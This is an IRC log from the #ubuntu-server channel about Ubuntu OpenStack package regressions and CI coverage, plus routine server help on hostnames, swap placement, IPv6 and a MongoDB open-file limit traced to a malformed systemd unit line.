<ubottu> bug 1628419 in dpdk (Ubuntu) "l2fwd and other dpdk applications are no more finding their pmd drivers" [High,Triaged] https://launchpad.net/bugs/1628419
<ubottu> bug 1625542 in dpdk (Ubuntu) "--vhost-owner --vhost-perm no more transferred to DPDK EAL commandline" [High,Triaged] https://launchpad.net/bugs/1625542
<jamespage> cpaelzer, nowhere to test it :-)
<cpaelzer> jamespage: good, just wanted to avoid double debugging
<jamespage> cpaelzer, +1
<coreycb> nacc, new python-taskflow synced and that builds ok.  still working on the python-eventlet ftbfs.
<btorch> anyone here uses trusty seeds for kickstart ? I'm having issues with partman ... debconf-get-selections outputs partman sections that do not start with d-i but most examples I see have d-i in front of the line , anyone know the correct way ?
<MelRay> Hi everyone...is there a channel where I can ask a question about a .pem certificate?
<jamespage> coreycb, ddellav: pushed staging->proposed->updates for newton
<jamespage> it smoked ok
<caribou> rbasak: nacc: Here is the MR for the clamav merge w/o Universe dependancy : https://code.launchpad.net/~louis-bouchard/ubuntu/+source/clamav/+git/clamav/+merge/307321
<coreycb> jamespage, ok thanks
<skinux> Having trouble with MySQL (Maria), since updating, I had to create a new user and grant all privileges (used root before), but still can't connect using HeidiSQL nor PHP scripts?
<nacc> coreycb: thank you!
<nacc> caribou: cool, I will take a look later today (rbasak is out)
<caribou> nacc: just thought I'd follow the process instead of just uploading it
<nacc> caribou: sure, one of our goals for this cycle or next is to figure out the best way forward for bugs and rebasing merges
<caribou> nacc: but I can upload it if you want, it's been blocked for quite a whie
<nacc> caribou: ack, i think that's fine, given the timeline
<nacc> caribou: and the importer will just pick it up this time
<caribou> nacc: well, this can wait until monday; I usually avoid uploading on fridays
<coreycb> nacc, also uploading an updated eventlet here in a few minutes
<coreycb> nacc, so both ftbfs should be resolved
<nacc> coreycb: great!
<EmilienM> jamespage, coreycb: I think we found a regression in aodh packaging
<EmilienM> the process doesn't start anymore in Puppet Ci
<EmilienM> usage: aodh-api [-h] [--port PORT]
<EmilienM>  aodh-api: error: unrecognized arguments: --config-file=/etc/aodh/aodh.conf --log-file=/var/log/aodh/aodh-api.log
<EmilienM> aodh-api.service: Main process exited, code=exited, status=2/INVALIDARGUMENT
<EmilienM> it's happenning since a few minutes / hours - everything was working fine before
<jamespage> EmilienM, ah
<EmilienM> do you test Aodh ?
<jamespage> EmilienM, I suspect a ceilometer-api style switch to wsgi_script
<jamespage> EmilienM, nope
<EmilienM> why such a change now?
<EmilienM> everything was working so fine
<jamespage> EmilienM, ask upstream aodh
<jamespage> tbh this was a mess with ceilometer
<EmilienM> jamespage: I'm not sure that's 100% related to upstream
<EmilienM> in RDO we are on trunk and have 0 problem at this time.
<jamespage> EmilienM, oh its 100% related to upstream
<jamespage> EmilienM, do you deploy in wsgi for RDO?
<EmilienM> https://github.com/openstack/aodh/commit/3990c5b7e1bb783092166bebf060e7846757c824
<EmilienM> it works in devstack :(
<EmilienM> jamespage: yep
<EmilienM> jamespage: we deploy everything in wsgi
<jamespage> even in Ubuntu?
<EmilienM> yes
<jamespage> EmilienM, I can fix this, but its as a result of switching certain daemons to be wsgi_script generated between b3 and rc
<EmilienM> jamespage: a sec, I asked to jd to join
<jd__> howdy
<jamespage> fine but I had this same conversation with him last week about ceilometer :-)
<jamespage> hey jd__
<jd__> I know you jamespage indeed ;)
<jd__> how can I help? if I can
<jamespage> jd__, EmilienM just tripped over the switch to using wsgi_script for aodh-api
<jamespage> same as I hit and fixed last week
<jamespage> for ceilometer
<jd__> I see
<jd__> old pbr?
<coreycb> ddellav, can I sync magnum?  I can't ask the release team to accept k8sclient until something depends on it
<EmilienM> jd__: it works fine in RDO but not on Ubuntu
<jamespage> jd__, no but the switch mandates a change to the service file to splice in -- for the wsgi_script startup stuff
<jamespage> /usr/bin/aodh-api -- --config-file=/etc/aodh/aodh.conf --log-file=/var/log/aodh/aodh-api.log
<jamespage> vs
<jamespage> /usr/bin/aodh-api --config-file=/etc/aodh/aodh.conf --log-file=/var/log/aodh/aodh-api.log
<EmilienM> it's weird, we run it in Apache
<EmilienM> but I think you start the process at setup right?
<jamespage> yes
<EmilienM> ...
<EmilienM> ok, I saw that before ;-)
<jd__> jamespage: so you can fix that no? btw --config-file to that path is the default so you can remove it I think
<jamespage> jd__, I can fix it yes
<EmilienM> problem solved?
<ddellav> coreycb i just uploaded k8sclient to a ppa and I'm building magnum now with it. I'll let you know how it goes.
<coreycb> ddellav, ok
<EmilienM> jamespage: please let me know when it's fixed, our CI is currently broken because of that.
<EmilienM> it blocks everything to merge
<jamespage> EmilienM, it will be some hours to work through the system
<EmilienM> :(
<EmilienM> some hours
<EmilienM> ok
<EmilienM> why does it take so much time since you don't test aodh?
<jamespage> EmilienM, because first i have to upload to ubuntu development, then the release team have to accept it - it has to build and then it gets automatically backported to the uca, where it goes through a proposed area before getting to the -updates pocket you test against
<jamespage> EmilienM, tbh I was a bit :( about ceilometer making a change with no prior notification of deprecation of running -api outside of a wsgi container
<jamespage> but jd__ and I already discussed that
<jamespage> :-)
<jamespage> deprecation/removal
<EmilienM> jamespage: when do you plan to have testing for all packages that you build?
<jamespage> aodh should be included soon alongside barbican and designate
<jamespage> other stuff that just syncs from Debian - we won't test that stuff
<EmilienM> what if Puppet CI would not be around to provide feedback?
<EmilienM> ok so "comes from debian == we don't care" ?
<jamespage> EmilienM, no it means I have limited resource to deal with openstack packaging
<jamespage> I have to focus on a core set of packages
<jamespage> main vs universe in Ubuntu
<EmilienM> jamespage: should we remove our Ubuntu jobs?
<jamespage> EmilienM, depends whether you think people want some level of assurance of using puppet modules with Ubuntu
<jamespage> EmilienM, I'm sorry but sometimes bugs happen
<EmilienM> jamespage: it wouldn't happen if CI was in place, what resource need to be added to add a single service test?
<EmilienM> I'm always curious how packages can be published without testing
<EmilienM> I thought there would be some kind of packaging policy to test a package before publishing it
<jamespage> no we have a policy to test packages before we release them
<jamespage> and when I say 'we' I mean the ubuntu community
<EmilienM> ah so you test aodh?
<jamespage> anyway the fix is in the queue
<jamespage> it will backport in the next hour or so
<jamespage> EmilienM, do you think all 22000 packages in Ubuntu get tested before release?
<jamespage> they will be automatically checked for installability etc...
<EmilienM> I don't know, i'm asking
<jamespage> but function - well the core set in Ubuntu main get focus
<jamespage> but not all of them
<EmilienM> in RDO, we have a set of CI jobs testing OpenStack services
<EmilienM> so if you have a policy to test packages before a release, does this policy apply to OpenStack packages?
<EmilienM> jamespage: second question, would you be interested to run Puppet tooling to test what you don't have time to test? Our tooling can be run on any machine
<jamespage> EmilienM, it gets applied to openstack services for which we have charms for - aodh is a new charm, so its not entered packaging CI just yet (its already in charm CI)
<EmilienM> ok so if it works in Juju, package is promoted
<EmilienM> it reminds me the famous "It worked in Devstack" :-)
<EmilienM> are they pro-active and current work to increase testing coverage in juju?
<jamespage> EmilienM, tbh I find that comment rude
<jamespage> EmilienM, the charms are a deployment tool
<EmilienM> jamespage: it's not rude, it's humor :)
<jamespage> EmilienM, I'm guessing you use tempest to functionally test whatever puppet configures right?
<jamespage> well we do the same
<EmilienM> again, i'm trying to understand and find a solution
<EmilienM> yes
<EmilienM> that is a rough matrix of our coverage: https://github.com/openstack/puppet-openstack-integration#description
<dmsimard> jamespage: do you really use tempest? We found many packages to lack the tempest plugins required to actually test their project
<jamespage> EmilienM, we do a full, multi-unit cloud deployment using production grade tooling and test with tempest
<jamespage> that's why I found you 'it worked in devstack' comment a little offensive
<jamespage> dmsimard, yeah I agree there are gaps
<EmilienM> dmsimard: your example is Gnocchi and UCA CI doesn't test Gnocchi
<EmilienM> jamespage: it's humor again
<dmsimard> jamespage: should we file bugs against cloud-archive about packages that are missing their tempest plugins ?
<jamespage> no we don't have gnocchi charms
<EmilienM> jamespage: apologize if this sentence hurts
<jamespage> EmilienM, thankyou
<EmilienM> now, let's find a solution
<jamespage> dmsimard, if there is something missing from a package, please do
<EmilienM> from the upstream perspective, a solution would be to gate Debian/Ubuntu packages provided by OpenStack repositories (where zigo works) against Puppet CI jobs
<EmilienM> and if they work, start using them
<jgrimm> nacc, can you nominate 1622622 for trusty please? needs fixed there (fix already in yakkety&xenial)
<nacc> jgrimm: are you sure on that bug #?
<jgrimm> 1622622
<jamespage> EmilienM, I'm not sure that accurately represents the lose coupling of development workflows between Ubuntu and Debian
<jgrimm> nacc, ? should be samba bug?
<EmilienM> jamespage: right, but we (puppet Ci) are strong users from UCA and our CI keeps breaking
<jamespage> EmilienM, the risk of aligning with the Debian packages zigo is managing under /openstack is that might not actually be the final story with what ends up in each distribution
<EmilienM> jamespage: i'm trying to find productive solutions
<jamespage> EmilienM, I appreciate that - you've just caught me right at the end of my day after a very long one yesterday in the run up the charm feature freeze
<jamespage> EmilienM, can we quantify 'keeps breaking'
<EmilienM> it was a rough week I agree
<jamespage> I think this cycle has been better (but not perfect)
<EmilienM> jamespage: I agree it has been more stable
<jamespage> EmilienM, we have repositories based on the WIP packaging changes + branches of OpenStack; I really want to focus and CI testing on that source, as its the start of the development process for a package to enter Ubuntu and then the UCA
<EmilienM> jamespage: but there are 2 things I would like to give as feedback:
<jamespage> WIP means unreleased here
<EmilienM> 1) the velocity of packages updates is still too slow, you don't update packages often enough so when it breaks, it's usually at bad time (release)
<EmilienM> 2) the lack of coverage by Juju is concerning, it's not the first time Telemetry services used to fail
<jamespage> EmilienM, what's your ideal velocity for 1) ?
<EmilienM> jamespage: maybe you could have nightly build to start
<EmilienM> jamespage: in RDO we build at each commit in OpenStack
<EmilienM> but having nightly builds would be a nice start
<jamespage> EmilienM, https://launchpad.net/~openstack-ubuntu-testing/+archive/ubuntu/newton/+packages
<jamespage> snap
<nacc> jgrimm: ack, typo on my part
<jamespage> EmilienM, we also have equivs for mitaka and liberty as well
<nacc> jgrimm: so xenial should be fix released?
<jgrimm> nacc, yep, but i was waiting till the trusty nomination so i didn't forget. i'll fix now
<jamespage> EmilienM, per commit(ish) builds of packages - ish due to the resolution of git repo checks more than anything
<nacc> jgrimm: thanks
<EmilienM> jamespage: interesting
<jamespage> EmilienM, we've done this since essex, albeit with a break for a cycle due to some resourcing shortfall
<jamespage> but that's actively maintained now by the Ubuntu OpenStack Team
<EmilienM> jamespage: I think 2) is what is worries me the most, since it affects Puppet OpenStack upstream CI
<jamespage> EmilienM, yeah - we're working to plug those gaps
<jamespage> EmilienM, it might be worth getting something together which documents the gaps in coverage between puppet and charms
<EmilienM> cool
<EmilienM> it's good to hear :)
<jamespage> EmilienM, then at a minimum we have a high risk list to check off on for know gaps
<EmilienM> our coverage is documented here: https://github.com/openstack/puppet-openstack-integration#description
<jamespage> EmilienM, ack
<jamespage> EmilienM, we'll pull something similar together for the Ubuntu Packaging CI
<jamespage> I can see some obvious gaps
<EmilienM> that's a good news :)
<jamespage> EmilienM, I need to put work down for today; lets make sure we move things in a positive direction going forwards - happy to grab some time at the summit to discuss this specifically...
<EmilienM> jamespage: thanks for helping here
<EmilienM> I didn't disable jobs on ubuntu until now because i want to help
<EmilienM> if I would not, I would just have disabled them
<EmilienM> and it's not the case ;-)
<EmilienM> so thanks for taking time to discuss, and i'm sure things will get improved
<skinux> Anyone good with MariaDB?
<jamespage> EmilienM, hey here's something that might be a quick win to give early warning of something broken
<jamespage> EmilienM, can you add a non-voting job that runs from the -proposed pocket
<jamespage> ?
 * jamespage eods
<jamespage> have a nice weekend all
<EmilienM> jamespage: we could
<powersj> nacc, Is this waiting for someone to package up? Bug# 1625734
<nacc> powersj: i can, is fonts-android back in main now?
<nacc> powersj: looks to be in universe right now but might get pulled once i do the package update
<powersj> nacc, 1626245 is the MIR
<ddellav> coreycb finally got magnum to build. I had a heck of a time getting sbuild to pull in os-api-ref from yakkety-proposed. I finally gave up and just uploaded it to my ppa.
<nacc> powersj: ack, uploading
<powersj> nacc, thanks!
<jamespage> EmilienM, just pushed aodh fixes to -updates
<EmilienM> jamespage: thanks a ton, it must be late for you
<EmilienM> have a great week end
<jamespage> you to
<EmilienM> thanks!
<skinux> I swear! Update of Ubuntu has rendered MySQL useless
<skinux> I can only connect using root, only doing sudo mysql
<torak> is setting up your server and database to the same computer logical?
<bekks> sure, why not?
<torak> bekks: i dont know it sounds like its going to overwhelm the computer
<torak> bekks: i know it is more fast. but how about security?
<nacc> skinux: what did you update from?
<bekks> torak: Depends on your configuration.
<torak> bekks: what can i do?
<nacc> torak: by 'logical' did you mean 'recommended'? it really depends
<bekks> torak: Be more precise and explain what you are actually trying to do.
<torak> nacc: yes i mean recommended
<nacc> torak: it really depends :)
<nacc> torak: what's your end goal?
<torak> bekks: i have an ubuntu server at a digital ocean machine. Its a parse-server and i am using mongodb which is hosted on mlab and free(not for production phase)
<torak> So buying a mlab hosted mongodb database is much much expensive than installing mongodb to my existing server. But there is one question that makes me thin. Should i install mongodb to my existing parse-server machine or should i create another ubuntu server and install it on the new server.
<sarnold> I understand mongo likes memory. a lot of it.
<nacc> yeah, i would expect many databases to be pretty memory-intensive, albeit depending on application
<nacc> so if your parse-server instance is not memory-heavy, it might be worth having one optimized/tailored for db usage
<torak> nacc: I don't have any statistics about it. I don't know how much people will use this app or how much ram should i need. Thats why these kind of services are good because its too easy to scale up. But what about that. I have 20GB SSD space in my cheap parse-server machine. So i think this space is going to waste. I think using it for db could be usefull and cheaper. Plus if there is some stress i can scale up.
<nacc> torak: seems like you have a reasonable plan in-place
<torak> nacc: yes. sounded nice to me too. :)
<wolflarson> I changed my hostname a few days ago and the network seems to have picked that up but ssh and sudo dont seem to know that I did it and keep telling me it is unable to resolve my old hostname.
<wolflarson> not really a problem because the commands still seem to be working but would be nice to get rid of errors
<sarnold> wolflarson: probably you need to fix the 127.0.1.1 entry in /etc/hosts
<wolflarson> it just lists localhost
<wolflarson> should it list my hostname as well?
<sarnold> 127.0.0.1 should be localhost; the 127.0.1.1 should be your hostname
#ubuntu-server 2016-10-01
<wolflarson> I should mention it is still asking for my old hostname. sudo: unable to resolve host <oldhostname>
<sarnold> what does uname -a report?
<wolflarson> old hostname
<sarnold> wolflarson: running "hostname <newhostname>" will probably sort that out
<sarnold> wolflarson: maybe "hostname --file /etc/hostname" ?
<wolflarson> hmm thats how I changed it in the first place though.
<wolflarson> I did not do the --file part will give that a shot
<wolflarson> /etc/hostname was showing the correct host however
<wolflarson> adding --file seems to have worked thanks sarnold
<wolflarson> that or opening a new session picked up the 127.0.1.1 change to hosts. whatever way it is now working
<sarnold> wolflarson: nice :)
<sarnold> wolflarson: twenty-ish years ago I set up an SCO unix machine, and it had beena real bastard on the first two attempts, so on the third attempt I gave it a -terrible- bad word for a system name... and when the time came to deploy it, I couldn't track down every bloody use of the bad word
<sarnold> I thought I got them all but we kept finding occurances where we didn't expect it and things broke ...
<wolflarson> lol
<sarnold> yet another re-install required :)
<jak2000> hi all
<jak2000> i buy a domain and how to configure the domain in the server? i want setup a mails erver(postfix) and webserver http2 thnks
<patdk-lap> jak2000, I would highly recommend you don't do that
<jak2000> why?
<jak2000> ?
<ChrisWarrick> Hello, have you got any good and up-to-date guides on setting up L2TP/IPSec VPNs?
<DexterF> hi all
<DexterF> server as base for media center, installing to 32GB usb3 thumbdrive for / and /boot. 3xsata hdds supposed to be main storage for media in md raid5. now: where do I put swap if I mean to suspend-to-disk?
<DexterF> I was thinking: 4GB RAM, so put 3x 2GB swap in all of the 3 array drives, but then thought: bad idea, if one disk fails: no resume from disk. if I put swap on the raid5/lvm: lots of writing when swap is accessed.
<RoyK> I'd put the swap on the USB thing
<RoyK> gparted should be able to change the partition size, although perhaps from a live usb boot, since it's not always easy to change a mounted fs
<RoyK> IIRC swap needs to be on a dedicated partition for suspend-to-disk to work
<RoyK> and separating data from system, like you're doing, is a very good idea indeed
<DexterF> RoyK: swap on the usb drive thought crossed my mind, too, if it only is used for suspend then the wear would even be ok, question is: how much swap does linux use when there's plenty of RAM. it's 4GB for a media center / DVB streamer on a minimum install so I don't expect it to use swap
<RoyK> DexterF: but again - I'm not sure if you'll need suspend-to-disk on such a machine. I just use a raspberry pi for mine with openelec and it doesn't have that feature
<DexterF> that's option B: "always on, don't suspend at all." power consumption is at 20W idle and barely exceeds 25 active.
<DexterF> it really is feasible.
<DexterF> leave out swap altogether then?
<RoyK> DexterF: linux usually uses a wee bit of swap, but that's tunable with the vm.swappiness setting, default 60. Set that to 1 and it won't use much unless it's really necessary
<RoyK> sysctl vm.swappiness
<RoyK> will tell you it's setting
<DexterF> ok, swap goes to the usb thumb then
<RoyK> yes
<DexterF> did not know that, thanks
<RoyK> create a file, like /etc/sysctl.d/10-swappiness.conf
<RoyK> add "vm.swappiness = 1" to it and run sysctl -p /etc/sysctl.d/10-swappiness.conf to have sysctl read it
<DexterF>  -p is for persistent?
<RoyK> man sysctl
<RoyK> those things aren't persistent, but creating that file, means sysctl will read it during boot
<DexterF> got it
<DexterF> what the *flying*....
<DexterF> my first attempt was to install directly install on radi5 everything, then found it doesnt fly well with grub, so I thought, ok, put in another usb drive for / /boot swap and start over form scratch.
<DexterF> then the installer found the old raid config and I thought, better dd over the first 4M of the raid disks. did that
<DexterF> now I created md0 again and it *finds* the former LVM volumes from installation 1. where the heck did it find that info?!
<DexterF> LVM keeps a config backup at the end of the pv, right?
<DexterF> installation fails due to shoddy sata cable on disk 3 :D
<DexterF> then again maybe not. "base-installer: error: could not find any live images"
<DexterF> https://bugs.launchpad.net/ubuntu/+source/live-installer/+bug/1575652 seems related. not sure and not sure what to do about it.
<ubottu> Launchpad bug 1575652 in live-installer (Ubuntu Yakkety) "PXE install prefixes /cdrom to squashfs location, fails to find it" [High,Fix released]
<DexterF> any way to continue this installation or do I need to boot over and put the line in grub as suggested?
<DexterF> ok, it works when *not* cheking "live installer" in the options. what's the difference in that anyway?
<RoyK> DexterF: AFAIK grub doesn't support booting from anything but normal disks and mirrors (raid-1)
<RoyK> DexterF: separate data and storage, and you'll be fine
<DexterF> RoyK: yes, playing it ssafe now. grub2 actually does boot from lvm on raid5, but as soon as something happens you find yourself at a grub shell. plus, grub2 has to be installed to all disks. now it's on one and I should be good.
<DexterF> K.I.S.S. principle.
<RoyK> damn - didn't know that, but still, separating data from the system will never hurt
<RoyK> keep the system and its swap etc on a separate, preferably mirrored volume and use raid-something or zfs for the est
<RoyK> or even btrfs if you like to play with matches and petrol
<cossier> hola
#ubuntu-server 2016-10-02
<lunaphyte> hi.  i have a 16.04 computer that includes an nfs mount in fstab.  sometimes, the network sucks, and during boot, the share fails to mount.  there is a long, long, timeout when this happens.  how can i change this timeout?
<pmp6nl> Hi, I just installed a new server and I am trying to figure out the best way I can find a directory via the ip address. For example I setup siteabc.com, but I need to access it via the ip address (I havent set up dns yet). I have several sites on the server. Any idea.
<pmp6nl> THanks
<JanC> pmp6nl: you can temporarily(!) add the domain to your local /etc/hosts
<eagleeyes> What command can be used to reconfigure network after an install and bring eth0 up for dhcp req?
<Gorian> eagleeyes, not sure, but you can manually edit the config file
<Gorian> https://help.ubuntu.com/lts/serverguide/network-configuration.html
<Gorian> nano /etc/network/interfaces
<eagleeyes> I did it manually but can't ping out.
<Gorian> then add "auto eth0" and "iface eth0 inet dhcp"
<Gorian> did you reset the interfaces?
<Gorian> well, I guess, where are you in the "doing it manually" process?
<Gorian> do you have an IP via DHCP? Or you just configured the interface/edited the file?
<txwizard> hello
<pterodactyl> I just disabled ipv6 on my ubuntu xenial server from systemctl and restarted my networking service. I also reloaded systemctl from default file(systemctl -p) but netstat shows that services are still listening on ipv6. How do I stop them?
<Ben64> pterodactyl: why
<pterodactyl> I'm not using ipv6 at this time and open ports just scares me no matter even if the service on it is not vulnerable. So just want to stop them.
<andol> pterodactyl: Those services netstat says are listening on IPv6, is that "::" showing up?
<pterodactyl> yup
<andol> pterodactyl: That being what most services uses to combine all-ipv4 and all-ipv6 by default. Unless you actually have an (global) IPv6 address configured, that doesn't matter.
<Ben64> weird to disable ipv6 too, it's the future of the internet
<andol> pterodactyl: If that is still something you want to fix for some odd reason then that has to be fixed on an application basis, by configuring them to explicit bind to 0.0.0.0 or something.
<andol> pterodactyl: Yet, if you want an extra safety belt it might be easier just to use ip6tables to REJECT all.
<andol> Aside from that I agree with Ben64.
<andol> Why not simple also use IPv6? Why would you assume that your applications would be more vulnerable across IPv6 than across IPv4?
<pterodactyl> andol : It's not that I assume so. Looking at open ports just give me a creepy feeling. So I thought I'd just disable them. Anyway I guess I'll just leave them running.
<Ben64> but the same ports are open on ipv4...
<andol> pterodactyl: Or you could find some other way to deal with that anxiety, and get on the IPv6 train? :)
<Ben64> toot toot, here comes the cure for running out of IPs
<pterodactyl> andol and Ben64 : Guess I have to agree with you guys.
<andol> Good :-)
<pterodactyl> Thanks guys. :)
<pterodactyl> Gotta go.
<m0ltar> Hi! Does anyone know how to set the hard "file open limit" systemwide?  I have mongo that is using almost a million open files ... stupid mongo. and it is crashing because the limit is too low, but whatever i try to raise it has no effect
<Walex> m0ltar: yes.
<m0ltar> Walex: good
<Walex> m0ltar: b ut it is not necessary. 'ulimit' values are inherited like evn vars.
<Walex> m0ltar: so just set in the script that start Mongo.
<m0ltar> Walex: system uses systemd
<m0ltar> which had the upper limit set to 1 millin
<Walex> m0ltar: BTW Mongo should not be opening a million files or something like that. That probably needs fixing.
<m0ltar> yet mongod still didnt start
<m0ltar> Walex: yes, agreed. But cannot fix it all at once.
<m0ltar> For now I need to get it running
<m0ltar> Then delete some collections
<Walex> m0ltar: there is also a systemwide limit I think but not sure.
<m0ltar> Walex: sure, and I set it high, yet still no cigar
<Walex> m0ltar: you can check the actual limit with 'cat /proc/$PID/limits'
<m0ltar> It's set to 65536
<Walex> m0ltar: or after you set 'ulimit -n ....' use 'ulimit -H -a'
<m0ltar> Walex: yeah I did all that
<Walex> man ulimit
<m0ltar> $pid/limits shows 65536, yet mongo actually has almost million files open
<m0ltar> verified via "lsof | grep mongod | wc -l"
<m0ltar> but i'm running it as root now, so maybe that does not pay attention to limits
<Walex> m0ltar: that is unlikely
<m0ltar> it works as root, but dies as mongodb
<m0ltar> lsof | grep mongod | wc -l -- now reports 1188809
<m0ltar> crazyness
<Walex> m0ltar: 'root' can *raise* limits, but not ignore them
<m0ltar> ok well, i have no other explanations :)
<m0ltar> cat /proc/2690/limits | grep "Max open files"   --- Max open files            65536                65536                files
<m0ltar> ulimit -n -H  ---- 65536
<m0ltar> lsof | grep mongod | wc -l     ---   1188809
<Walex> to check again 'ls /proc/$PID/fd/ | wc -l
<Walex> to check again 'ls /proc/$PID/fd/ | wc -l'
<Walex> to check again 'ls /proc/$PID/fd/ | wc -l' gives you number of file descriptors
<m0ltar>  /fd count is 2107
<Walex> m0ltar: note that 'lsof' also lists mapped segments
<m0ltar> ah ok
<m0ltar> so actual files open is 2107? then why the hell does mongo complain about not having enough
<Walex> m0ltar: probably MongoDB has got 1 million 'malloc' segments
<m0ltar> UnknownError: 24: Too many open files
<Walex> m0ltar: sometimes error codes are reused for "similar" situations
<Walex> m0ltar: it is likely that it has run out of memory mappings
<m0ltar> hm
<m0ltar> when running under root it does seem to use a lot of memory -- in fact all of it
<m0ltar> and half of used memory also is as swap form
<Walex> m0ltar: I haven't used Mongo for a while, but I remember that there was  an issue related to that, perhaps the log
<m0ltar> dammit things with mongo are worse than I thought
<Walex> m0ltar: Mongo is not very "reliable" let's say./
<m0ltar> i agree, and we are moving away from it very fast
<m0ltar> just havent really done it fully yet
<Walex> m0ltar: also it is subject to a rolling-release model, so bug fixes usually don't get backported
<m0ltar> I was installing from their own repo
<m0ltar> latest version
<Walex> m0ltar: I can look at my notes if you will around to see what kind of similar issue I was having.
<m0ltar> Walex: that would be great! Thanks
<Walex> m0ltar: in my case it was an old iussue, but I'll have a look. Not sure I put down a note.
<m0ltar> I'm surprised it works under root user though
<m0ltar> if it doesnt have enough mem, then how come it still works
<m0ltar> must be some kind of limit too
<m0ltar> ulimit output is the same for root and mongodb user
<Walex> m0ltar: in the meantime try 'lsof -p $PID | less' to see what is being mapped 1 million times
<m0ltar> I did do that, but there are a million records, so how do you even review that :D
<Walex> m0ltar: you just scroll a bit, and if there are a million entries probably they are all similar
<m0ltar> Actually that output only gives me 2129 lines
<m0ltar> but if I don't include the pid and grep for mongod in the output, i get millions of lines'
<Walex> m0ltar: then it is something else...
<Walex> m0ltar: lsof | sed 's/ .*//' | sort | uniq -c | sort -n | tail -20
<m0ltar> it seems like it is spawning too many children
<Walex> m0ltar: then probably the children die and it loops
<m0ltar> i'm scrolling through the list manually and i see the same files over and over, and the PID in the third column goes up by
<m0ltar> 1
<Walex> m0ltar: tryu to 'strace' one of them.
<m0ltar> dont really know how to strace
<m0ltar> i attached to the process, but then don't know what to do
<Walex> m0ltar: ahhh I remember what was my issue, that the DB files grew enormously because of many transactioons.
<Walex> m0ltar: you can run something like 'strace -p $PID' and see what comes out
<m0ltar> Process 2691 attached
<m0ltar> rt_sigtimedwait([HUP INT USR1 TERM XCPU], NULL, NULL, 8
<m0ltar> that's all that came out
<m0ltar> but that process is not even live
<Walex> m0ltar: uhhhh that means they are hanging.
<m0ltar> if i do ps aux there is no process with that pid
<Walex> m0ltar: it is a thread most likely
<m0ltar> yeah
<m0ltar> so every thread then holds a file open
<Walex> m0ltar: try 'pmap -p 2691'
<m0ltar> or are file handles inherited ?
<Walex> m0ltar: file handles are inherited and shared.
<m0ltar> ok that gave me a lot of output
<m0ltar> ok then counting lsof output is irrelevant
<m0ltar> our db is def huge though... its 311 GB now :/
<Walex> m0ltar: have you looked at 'dmesg | trail -50'
<Walex> m0ltar: have you looked at 'dmesg | tail -50'
<Walex> m0ltar: also at 'tail -50 /var/log/syslog'
<m0ltar> dmesg tail gives me lots of info
<m0ltar> but no idea what it all means
<Walex> m0ltar: if there is a resource shortage it should affects other daemons
<m0ltar> there are no other daemons
<Walex> m0ltar: don't joke...
<m0ltar> :D
<m0ltar> well no other meaningful ones
<Walex> m0ltar: also just to be sure look at /proc/meminfo and the top lines of 'slabtop'
<Walex> m0ltar: the non-meaningful ones are likely to be affected too if there is something badly broken
<m0ltar> you wont believe this...
<m0ltar> this is so fucking idiotic
<m0ltar> this boggles my mind
<m0ltar> the service file that came with mongo (/lib/systemd/system/mongod.service)
<m0ltar> had limits set
<m0ltar> It read: LimitNOFILE=64000 # number of open files
<m0ltar> syslog said
<m0ltar> limits ignored "64000 # number of open files" is not a valid value...
<Walex> m0ltar: yes, but that should be plenty
<m0ltar> W.T.F.
<m0ltar> it was treating the whole thing as a limit with the comment
<Walex> ahhhh funny
<m0ltar> so questions arise
<m0ltar> why systemd is not parsing out comments
<m0ltar> and 2) why mongod is shipped with shitty systemd file
<m0ltar> in fact, i think systemd unit files are ini files, and you are supposed to use ";" for cmments
<m0ltar> possibly # also works, dont know, but i've been always using ; because of windows days & ini files ;)
<Walex> m0ltar: the problem currently is understanding why there are very many MongoDB threads.
<m0ltar> well, it is kind of expected, because its heavily used
<m0ltar> mutiple  servers connect inside multiple threads
<Walex> m0ltar: try 'top' and then "H" to show threads
<m0ltar> 1-5 mongod processes
<Walex> m0ltar: there are must a lot of threads, scroll down until you see them
<m0ltar> oh ya there are quite a bit
<Walex> m0ltar: they are all mongod
<m0ltar> yeah
<Walex> or something else?
<m0ltar> nah mostly mongod
<Walex> m0ltar: I just did a web search for the string "UnknownError: 24: Too many open files
<Walex> m0ltar: there are some entries
<m0ltar> i did search that too
<m0ltar> nothing good came out of it :)
<m0ltar> basically my understanding is that mongod in the latest version keeps 2 FH for each collection
<m0ltar> we have 2000+ collections, so its 4000 FH
<m0ltar> but the threads... i am not sure.
<m0ltar> most likely it's a thread per connection
<m0ltar> it currently has 469 connections
<m0ltar> so that kind of adds up
<Walex> m0ltar: 469 connections is not that huge.
<m0ltar> sure, but I think it spawns a new thread per connections, that's why there are so many threads
<m0ltar> by scrolling thru top it does look like ~ 500 threads
<m0ltar> so it kinda makes sense
<Walex> m0ltar: yes, but 469 connections should not be causing resource issues like too many FDs open
<m0ltar> Walex: I think the issue was that because systemd.service file setting was simply ignored, it was falling back to some default setting
<Walex> m0ltar: using KDE etc. on my laptop I have 350 processes...
<m0ltar> which was low I am guessing. Altho ulimit was reporting 64k
<m0ltar> or worse, maybe, because systemd setting was bad, it was defaulted to "null" or 0
<m0ltar> and thereby even 1 FD would be too many
<m0ltar> surprisingly mongod has no "issues" tab https://github.com/mongodb/mongo
<m0ltar> weird
<m0ltar> oh remember, they were using jira
<m0ltar> weirdos :/
<Walex> m0ltar: the default is IIRC 1024
<m0ltar> Walex, well, that would definitely not be enough
<m0ltar> because i read it uses 2 FD per collection
<m0ltar> and we have 2000+ collections
<Walex> m0ltar: that's fairly brave...
<m0ltar> Walex, buddy, you were so helpful. Thanks! Give me your Paypal address I will send you some beer money :D
<Walex> m0ltar: don't worry.
<m0ltar> Or bitcoin or whatever, altho I think I don't have many coins left in the wallet
<m0ltar> I am not worried... just want to share the love the only way I can virtually
<Walex> m0ltar: so 500 threads maybe each with 2,000 memory mapping, you get 1,000,000 mappings listed by 'lsof'
<m0ltar> if you have an amazon wish list, let me know i'll buy you something nice
<m0ltar> yeah it about adds up doesnt it?
<m0ltar> fuck, what was supposed to be a simple *minor* upgrade turned out to some stressful shit hahaha
<Walex> m0ltar: been there many times... I had to maintain an old versions of MongoDB used for Juju for OpenStack, and the whole was quite unreliable, lots of race conditions, had to hand-edit the collections a few times.
<Walex> m0ltar: BTW the manual page on limits and mongodb does not have the comment error: https://docs.mongodb.com/manual/reference/ulimit/#recommended-ulimit-settings
<Walex> m0ltar: it shows for 'upstart' the comment same line, but for 'systemd' the comments are all previous line.
<Walex> m0ltar: the people at Mongo that packaged it did not read their own docs :-)
<m0ltar> Walex: this was actually out of the repo!
<m0ltar> https://github.com/mongodb/mongo/commit/906a6f057f87fb4e51c4a698d9d6fe490fb293a2#diff-53ff8b2b2fd0259e92e2de365e2c4e27
